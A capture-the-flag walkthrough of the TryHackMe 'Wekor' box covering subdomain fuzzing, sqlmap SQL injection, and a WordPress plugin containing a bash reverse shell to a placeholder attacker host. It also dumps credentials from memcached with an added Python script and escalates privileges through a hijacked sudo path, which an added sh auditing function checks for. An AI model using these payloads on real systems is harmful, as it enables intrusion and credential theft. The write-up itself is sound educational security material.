THM: Wekor
CTF challenge involving SQLi, WordPress, vhost enumeration and recognising internal services ;)
Medium rated but surely that description gives a lot away? This is Wekor from THM.
SSH and HTTP only.
Since we already know there is a VHOST/subdomain to find, I’ll run WFUZZ:
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://wekor.thm" -H "Host: FUZZ.wekor.thm" -t 42 --hh 23
This turns up the subdomain site, so I add site.wekor.thm to /etc/hosts alongside wekor.thm.
On the main wekor.thm, robots.txt is mostly trolling apart from /comingreallysoon, which directs us to /it-next. This is a page with lots of stuff on it; the SQLi is in the coupon form on /it-next/it_cart.php, in the POST parameters coupon_code=asdsadsadasd&apply_coupon=Apply+Coupon. I save the raw request to a file called request, point sqlmap at it and enumerate the databases; there is a wordpress database, so I dump its contents with:
sqlmap -r request --level=1 --risk=1 --batch -D wordpress --dump
This gives us WordPress usernames and password hashes; with a little help from John we turn them into some user:password combinations.
WordPress is at site.wekor.thm/wordpress, and with the credentials gained from the SQLi we can log in. One of our users is a WP admin, so I upload a plugin zip containing a reverse shell.
└─# cat plugin_shell.php
<?php
/*
 * Plugin Name: Reverse Shell Plugin
 * Plugin URI:
 * Description: Reverse Shell Plugin
 * Version: 1.0
 * Author:
 * Author URI:
 */
exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'");
└─# zip plugin_shell.zip plugin_shell.php
  adding: plugin_shell.php (deflated 31%)
(ATTACKER_IP and PORT stand for the listener address, which is redacted here.) The plugin header comment is what makes WordPress accept the file as a plugin; the exec() runs as soon as the plugin is activated, giving a shell as www-data.
On the box
We're told to look for internal services, and LinPEAS finds memcached listening on port 11211 (bound to localhost only, which is why the external scan never showed it). Memcached has no authentication, so anyone on the box can read whatever an application has cached. I use telnet:
telnet localhost 11211
Connected to localhost.
Escape character is '^]'.
stats items
STAT items:1:number 5
STAT items:1:age 2096
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 0
STAT items:1:lrutail_reflocked 0
stats cachedump 1 100
ITEM id [4 b; 1615202210 s]
ITEM email [14 b; 1615202210 s]
ITEM salary [8 b; 1615202210 s]
ITEM password [15 b; 1615202210 s]
ITEM username [4 b; 1615202210 s]
get KEY password
VALUE password 0 15
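The three-step walk above (stats items to find slab classes, stats cachedump to list keys per slab, get to read each value) is the whole memcached enumeration technique, so here it is automated. This is an added example, not code from the writeup: the parsers handle the text protocol replies exactly as memcached formats them, dump_all drives them over any transport, and fake_memcached is a constructed stand-in with the same key names as the session above but made-up values (the real ones are redacted). tcp_sender is what you would pass instead on the box.

```python
"""Added example (not from the original writeup): dump every key/value a
memcached instance exposes by automating stats items -> stats cachedump -> get.
A constructed in-memory responder stands in for the real service so this runs
offline; swap in tcp_sender() to talk to 127.0.0.1:11211 on a target."""
import re
import socket
from typing import Callable, Dict, List

Sender = Callable[[bytes], bytes]  # sends one command, returns the whole reply


def slab_ids(stats_items: str) -> List[int]:
    """Slab class ids from a 'stats items' reply (lines 'STAT items:<id>:...')."""
    return sorted({int(m) for m in re.findall(r"^STAT items:(\d+):", stats_items, re.M)})


def cachedump_keys(dump: str) -> List[str]:
    """Key names from a 'stats cachedump' reply ('ITEM <key> [<n> b; <exp> s]')."""
    return re.findall(r"^ITEM (\S+) \[", dump, re.M)


def parse_get(reply: bytes) -> Dict[str, bytes]:
    """Values from a 'get' reply: 'VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\n'... 'END'.
    Data is sliced by the advertised byte count, so values containing CRLF survive."""
    out: Dict[str, bytes] = {}
    pos = 0
    while True:
        nl = reply.index(b"\r\n", pos)
        line = reply[pos:nl]
        if not line.startswith(b"VALUE "):
            break  # END, or ERROR/CLIENT_ERROR for a bad key
        _, key, _flags, nbytes = line.split()[:4]
        start = nl + 2
        out[key.decode()] = reply[start:start + int(nbytes)]
        pos = start + int(nbytes) + 2  # skip the data and its trailing CRLF
    return out


def dump_all(send: Sender, limit: int = 100) -> Dict[str, bytes]:
    """Walk every slab class, list up to `limit` keys in each, fetch every value."""
    found: Dict[str, bytes] = {}
    for slab in slab_ids(send(b"stats items\r\n").decode(errors="replace")):
        dump = send(f"stats cachedump {slab} {limit}\r\n".encode()).decode(errors="replace")
        for key in cachedump_keys(dump):
            found.update(parse_get(send(f"get {key}\r\n".encode())))
    return found


def tcp_sender(host: str = "127.0.0.1", port: int = 11211, timeout: float = 3.0) -> Sender:
    """Real transport: one TCP round trip per command, reading until END/ERROR."""
    def send(cmd: bytes) -> bytes:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(cmd)
            buf = b""
            while not (buf.endswith(b"END\r\n") or buf.endswith(b"ERROR\r\n")):
                chunk = s.recv(4096)
                if not chunk:
                    break
                buf += chunk
            return buf
    return send


# Constructed stand-in for the box's memcached: same key names as the telnet
# session, made-up values (the real ones are redacted in the writeup).
FAKE_STORE = {
    b"id": b"1234", b"email": b"orka@wekor.thm", b"salary": b"10000000",
    b"password": b"redacted-passwd", b"username": b"Orka",
}


def fake_memcached(cmd: bytes) -> bytes:
    words = cmd.strip().split()
    if words == [b"stats", b"items"]:
        return f"STAT items:1:number {len(FAKE_STORE)}\r\nSTAT items:1:age 2096\r\nEND\r\n".encode()
    if words[:3] == [b"stats", b"cachedump", b"1"]:
        body = b"".join(b"ITEM %s [%d b; 1615202210 s]\r\n" % (k, len(v)) for k, v in FAKE_STORE.items())
        return body + b"END\r\n"
    if words[:1] == [b"get"]:
        body = b"".join(b"VALUE %s 0 %d\r\n%s\r\n" % (k, len(FAKE_STORE[k]), FAKE_STORE[k])
                        for k in words[1:] if k in FAKE_STORE)
        return body + b"END\r\n"
    return b"ERROR\r\n"


if __name__ == "__main__":
    # On the box: dump_all(tcp_sender("127.0.0.1", 11211))
    for k, v in dump_all(fake_memcached).items():
        print(f"{k} = {v!r}")
```

Two caveats when running this for real: stats cachedump only returns the first couple of megabytes of key metadata per slab, so on a busy cache it is not exhaustive, and memcached 1.4.31 and later also offer lru_crawler metadump all, which lists every key in one go and is the better first choice where it is available.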
The cached password belongs to Orka, so from the reverse shell I can su to Orka:
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 36006
bash: cannot set terminal process group (1072): Inappropriate ioctl for device
bash: no job control in this shell
www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ su Orka
Password: REDACTED
# What can we do?
Orka@osboxes:~$ sudo -l
[sudo] password for Orka: REDACTED AGAIN LOL
Matching Defaults entries for Orka on osboxes:
    env_reset, mail_badpass,
User Orka may run the following commands on osboxes:
    (root) /home/Orka/Desktop/bitcoin
# Okay
Orka@osboxes:~$ mv Desktop Whatever
Orka@osboxes:~$ ls
Documents  Music  Public  Templates  Videos
Downloads  Pictures  user.txt  Whatever
Orka@osboxes:~$ mkdir Desktop
Orka@osboxes:~$ cd Desktop/
Orka@osboxes:~/Desktop$ ls
Orka@osboxes:~/Desktop$ printf 'sh\n' > bitcoin
Orka@osboxes:~/Desktop$ chmod +x bitcoin
Orka@osboxes:~/Desktop$ sudo -u root /home/Orka/Desktop/bitcoin
# cd /root
# id;hostname
uid=0(root) gid=0(root) groups=0(root)
osboxes
A quick explanation. bitcoin was a binary that called a Python script. Neither was writeable, both were owned by root, and I couldn't delete or rename either of them. Initially I tried messing with the things they were calling, like the Python modules being imported, but that wasn't working. So I just renamed the entire Desktop directory, made another one and created my own bitcoin file. Face-palmingly simple in the end. The takeaway: a sudo rule that names a path under a directory the user owns is only as strong as that directory, because the owner can rename it (or any writable component of the path) and plant a replacement at the same name; root ownership and read-only permissions on the binary itself do not help.
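The check that would have flagged this rule in seconds is "can I write to any directory on the way to the sudo target?", so here it is as a small POSIX sh function. This is an added example, not something from the writeup; it relies only on the shell's -w test, which reports the running user's effective permission, and the sudo -l parsing in the usage comment assumes the plain "(root) /path" line format shown above.

```sh
#!/bin/sh
# Added example (not from the original writeup): given the absolute path of a
# command that sudo lets a user run as root, report the closest ancestor
# directory the current user can write to.  Write access to any ancestor is
# enough to rename that component and plant a replacement, which is exactly
# the ~/Desktop trick above; ownership of the binary itself is irrelevant.

# Print the nearest writable ancestor of $1 and return 0, or return 1 if
# nothing up to / is writable (the rule is then only as weak as the file).
writable_ancestor() {
    p=$(dirname "$1")
    while :; do
        if [ -w "$p" ]; then
            printf '%s\n' "$p"
            return 0
        fi
        [ "$p" = "/" ] && return 1
        p=$(dirname "$p")
    done
}

# Classify a sudo target: "file" if the command itself is writable,
# "ancestor:<dir>" if some parent directory is, otherwise "ok".
sudo_target_risk() {
    if [ -w "$1" ]; then
        echo "file"
    elif d=$(writable_ancestor "$1"); then
        echo "ancestor:$d"
    else
        echo "ok"
    fi
}

# Usage: feed it each absolute path listed under "(root)" in sudo -l, e.g.
#   sudo -l | sed -n 's/^ *(root) //p' | while read -r cmd; do
#       printf '%s -> %s\n' "$cmd" "$(sudo_target_risk "$cmd")"
#   done
# On this box that prints:
#   /home/Orka/Desktop/bitcoin -> ancestor:/home/Orka
```

Run as root every -w test succeeds, so the function is only meaningful from the unprivileged account being audited. It also trusts -w, which reflects ownership, mode bits and ACLs but not a read-only mount, so a "writable" verdict is worth confirming with an actual rename before relying on it.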